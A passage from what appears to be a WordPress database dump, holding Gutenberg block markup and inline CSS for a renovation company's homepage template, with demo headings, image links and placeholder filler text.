976px){\n .block-e968bd23-7521-4da1-a172-0c209a166104 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-e968bd23-7521-4da1-a172-0c209a166104 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-e968bd23-7521-4da1-a172-0c209a166104 .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-e968bd23-7521-4da1-a172-0c209a166104\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"id\":20,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2021/05/faq-img.jpg\" alt=\"\" class=\"wp-image-20\"/></figure>\n<!-- /wp:image --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->','Home','','inherit','closed','closed','','336-revision-v1','','','2022-08-25 00:20:16','2022-08-25 00:20:16','',336,'https://cteisys.com/?p=501',0,'revision','',0),(338,1,'2021-05-25 05:46:14','2021-05-25 05:46:14','<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"54f70e91-0956-4fc9-871a-de156ed3fea0\",\"topPadding\":80,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":80,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#ffffff\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-1\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-1 skt-blocks-block-section-outer-wrap block-54f70e91-0956-4fc9-871a-de156ed3fea0 background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-54f70e91-0956-4fc9-871a-de156ed3fea0 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-54f70e91-0956-4fc9-871a-de156ed3fea0 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-54f70e91-0956-4fc9-871a-de156ed3fea0 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 80px; padding-bottom: 80px; padding-left: 10px; padding-right: 10px; }\n}\n .block-54f70e91-0956-4fc9-871a-de156ed3fea0.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-54f70e91-0956-4fc9-871a-de156ed3fea0.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-54f70e91-0956-4fc9-871a-de156ed3fea0.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-54f70e91-0956-4fc9-871a-de156ed3fea0.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-54f70e91-0956-4fc9-871a-de156ed3fea0.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 1); }\n</style><style type=\"text/css\"> .block-54f70e91-0956-4fc9-871a-de156ed3fea0 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-54f70e91-0956-4fc9-871a-de156ed3fea0 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-54f70e91-0956-4fc9-871a-de156ed3fea0.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-54f70e91-0956-4fc9-871a-de156ed3fea0 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-54f70e91-0956-4fc9-871a-de156ed3fea0.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-54f70e91-0956-4fc9-871a-de156ed3fea0 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-54f70e91-0956-4fc9-871a-de156ed3fea0.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(255, 255, 255, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"e718c7f4-3101-4945-8886-c525b27d59c5\"} -->\n<style type=\"text/css\"> .block-e718c7f4-3101-4945-8886-c525b27d59c5 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-e718c7f4-3101-4945-8886-c525b27d59c5 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-e718c7f4-3101-4945-8886-c525b27d59c5 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-e718c7f4-3101-4945-8886-c525b27d59c5 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-e718c7f4-3101-4945-8886-c525b27d59c5 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-e718c7f4-3101-4945-8886-c525b27d59c5 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-e718c7f4-3101-4945-8886-c525b27d59c5 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-e718c7f4-3101-4945-8886-c525b27d59c5 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"blockId\":\"40cbfd7e-b408-4a6e-8637-137c77d2044f\"} -->\n<style type=\"text/css\"> .block-40cbfd7e-b408-4a6e-8637-137c77d2044f .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-40cbfd7e-b408-4a6e-8637-137c77d2044f .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-40cbfd7e-b408-4a6e-8637-137c77d2044f .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-40cbfd7e-b408-4a6e-8637-137c77d2044f .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-40cbfd7e-b408-4a6e-8637-137c77d2044f .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-40cbfd7e-b408-4a6e-8637-137c77d2044f\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"id\":21,\"sizeSlug\":\"large\",\"linkDestination\":\"none\",\"className\":\"is-style-default\"} -->\n<figure class=\"wp-block-image size-large is-style-default\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/instruction-img.jpg\" alt=\"\" class=\"wp-image-21\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:skt-blocks/section {\"blockId\":\"81f0f8fd-3189-4eda-ba9e-d7772c28e5e4\",\"opacity\":100,\"backgroundColor\":\"#fe8333\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-quality-box\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-quality-box skt-blocks-block-section-outer-wrap block-81f0f8fd-3189-4eda-ba9e-d7772c28e5e4 background-type-color alignundefined\" style=\"z-index:1;max-width:900px;margin-left:auto;margin-right:auto\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-81f0f8fd-3189-4eda-ba9e-d7772c28e5e4 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-81f0f8fd-3189-4eda-ba9e-d7772c28e5e4 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-81f0f8fd-3189-4eda-ba9e-d7772c28e5e4 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n .block-81f0f8fd-3189-4eda-ba9e-d7772c28e5e4.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-81f0f8fd-3189-4eda-ba9e-d7772c28e5e4.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-81f0f8fd-3189-4eda-ba9e-d7772c28e5e4.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-81f0f8fd-3189-4eda-ba9e-d7772c28e5e4.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-81f0f8fd-3189-4eda-ba9e-d7772c28e5e4.background-type-video .skt-blocks-block-section {\n background-color: rgba(254, 131, 51, 1); }\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(254, 131, 51, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"966d1fac-366b-4a25-a711-34c2daed4faa\",\"showSubHeading\":false,\"showSeparator\":false,\"headSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":32,\"headingTitleFontSizeMobile\":30,\"headingTitleFontSizeTablet\":32,\"headingTitleFontWeight\":\"700\",\"headingTitleLineHeight\":1.3,\"headingTitleColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-966d1fac-366b-4a25-a711-34c2daed4faa .responsive-heading-title-text {\n font-size: 32px !important; margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-966d1fac-366b-4a25-a711-34c2daed4faa .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-966d1fac-366b-4a25-a711-34c2daed4faa .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-966d1fac-366b-4a25-a711-34c2daed4faa .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-966d1fac-366b-4a25-a711-34c2daed4faa .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-966d1fac-366b-4a25-a711-34c2daed4faa .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-966d1fac-366b-4a25-a711-34c2daed4faa .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-966d1fac-366b-4a25-a711-34c2daed4faa .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-966d1fac-366b-4a25-a711-34c2daed4faa .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-966d1fac-366b-4a25-a711-34c2daed4faa .responsive-heading-title-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-966d1fac-366b-4a25-a711-34c2daed4faa .responsive-heading-title-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-966d1fac-366b-4a25-a711-34c2daed4faa .responsive-heading-desc-text {\n font-size: undefinedpx !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-966d1fac-366b-4a25-a711-34c2daed4faa {\n text-align: center; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-966d1fac-366b-4a25-a711-34c2daed4faa {\n text-align: center; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-966d1fac-366b-4a25-a711-34c2daed4faa {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-966d1fac-366b-4a25-a711-34c2daed4faa\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.3;letter-spacing:0;color:#ffffff\">Quality<br>Works</h2></div>\n<!-- /wp:skt-blocks/advanced-heading --></div></section></div>\n<!-- /wp:skt-blocks/section --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":15,\"leftPadding\":50,\"topPaddingTablet\":15,\"leftPaddingTablet\":35,\"topPaddingMobile\":40,\"leftPaddingMobile\":0,\"blockId\":\"2242a745-9435-49ba-811b-1371abb1f6e5\"} -->\n<style type=\"text/css\"> .block-2242a745-9435-49ba-811b-1371abb1f6e5 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-2242a745-9435-49ba-811b-1371abb1f6e5 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-2242a745-9435-49ba-811b-1371abb1f6e5 .skt-blocks-block-column{\n padding-top: 15px; padding-bottom: undefinedpx; padding-left: 50px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-2242a745-9435-49ba-811b-1371abb1f6e5 .skt-blocks-block-column{\n padding-top: 15px; padding-bottom: undefinedpx; padding-left: 35px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-2242a745-9435-49ba-811b-1371abb1f6e5 .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-2242a745-9435-49ba-811b-1371abb1f6e5\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"928a4fc6-651b-48d1-b84c-f6dbb74d13f4\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":42,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-928a4fc6-651b-48d1-b84c-f6dbb74d13f4 .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-928a4fc6-651b-48d1-b84c-f6dbb74d13f4 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-928a4fc6-651b-48d1-b84c-f6dbb74d13f4 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-928a4fc6-651b-48d1-b84c-f6dbb74d13f4 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-928a4fc6-651b-48d1-b84c-f6dbb74d13f4 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-928a4fc6-651b-48d1-b84c-f6dbb74d13f4 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-928a4fc6-651b-48d1-b84c-f6dbb74d13f4 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-928a4fc6-651b-48d1-b84c-f6dbb74d13f4 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-928a4fc6-651b-48d1-b84c-f6dbb74d13f4 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-928a4fc6-651b-48d1-b84c-f6dbb74d13f4 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-928a4fc6-651b-48d1-b84c-f6dbb74d13f4 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-928a4fc6-651b-48d1-b84c-f6dbb74d13f4 .responsive-heading-desc-text {\n font-size: 42px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-928a4fc6-651b-48d1-b84c-f6dbb74d13f4 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-928a4fc6-651b-48d1-b84c-f6dbb74d13f4 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-928a4fc6-651b-48d1-b84c-f6dbb74d13f4 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-928a4fc6-651b-48d1-b84c-f6dbb74d13f4 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-928a4fc6-651b-48d1-b84c-f6dbb74d13f4 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-928a4fc6-651b-48d1-b84c-f6dbb74d13f4\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:0;color:#fe8333\">Our Introduction</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Welcome to Our<br>Renovation Group of<br>Company</p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph {\"style\":{\"typography\":{\"fontSize\":17},\"color\":{\"text\":\"#494848\"}},\"className\":\"section-content\"} -->\n<p class=\"section-content has-text-color\" style=\"color:#494848;font-size:17px\">Posuere tellus imperdiet facilisis. Curabitur vaucibusy telluseu semper nunc finibus placerat. Suspendissee potenti. Praesent vel sem in sem vulputate.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:skt-blocks/section {\"blockId\":\"84ac05c8-0a2b-4b07-96e1-e3af792b43b2\",\"topPadding\":0,\"topPaddingTablet\":0,\"bottomPadding\":80,\"leftPadding\":0,\"leftPaddingTablet\":0,\"rightPadding\":0,\"rightPaddingTablet\":0,\"topMarginTablet\":-15,\"className\":\"gb-renovation-contact\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-contact skt-blocks-block-section-outer-wrap block-84ac05c8-0a2b-4b07-96e1-e3af792b43b2 background-type-none alignundefined\" style=\"z-index:1;max-width:900px;margin-left:auto;margin-right:auto\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-84ac05c8-0a2b-4b07-96e1-e3af792b43b2 .skt-blocks-block-section{\n margin-top: -15px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 0px; padding-bottom: 10px; padding-left: 0px; padding-right: 0px; }\n}\n @media only screen and (max-width: 767px){\n .block-84ac05c8-0a2b-4b07-96e1-e3af792b43b2 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-84ac05c8-0a2b-4b07-96e1-e3af792b43b2 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 0px; padding-bottom: 80px; padding-left: 0px; padding-right: 0px; }\n}\n .block-84ac05c8-0a2b-4b07-96e1-e3af792b43b2.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-84ac05c8-0a2b-4b07-96e1-e3af792b43b2.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-84ac05c8-0a2b-4b07-96e1-e3af792b43b2.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-84ac05c8-0a2b-4b07-96e1-e3af792b43b2.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-84ac05c8-0a2b-4b07-96e1-e3af792b43b2.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"blockId\":\"b83736be-6095-44cc-85b8-e77d3b91af5b\"} -->\n<style type=\"text/css\"> .block-b83736be-6095-44cc-85b8-e77d3b91af5b .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-b83736be-6095-44cc-85b8-e77d3b91af5b .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-b83736be-6095-44cc-85b8-e77d3b91af5b .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-b83736be-6095-44cc-85b8-e77d3b91af5b .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-b83736be-6095-44cc-85b8-e77d3b91af5b .skt-blocks-block-columns{\n padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-b83736be-6095-44cc-85b8-e77d3b91af5b .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-b83736be-6095-44cc-85b8-e77d3b91af5b .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-b83736be-6095-44cc-85b8-e77d3b91af5b skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":45,\"leftPadding\":0,\"leftPaddingTablet\":0,\"topPaddingMobile\":0,\"blockId\":\"49f17b93-2599-4872-8e40-24f70dd3d637\"} -->\n<style type=\"text/css\"> .block-49f17b93-2599-4872-8e40-24f70dd3d637 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-49f17b93-2599-4872-8e40-24f70dd3d637 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-49f17b93-2599-4872-8e40-24f70dd3d637 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-49f17b93-2599-4872-8e40-24f70dd3d637 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-49f17b93-2599-4872-8e40-24f70dd3d637 .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; 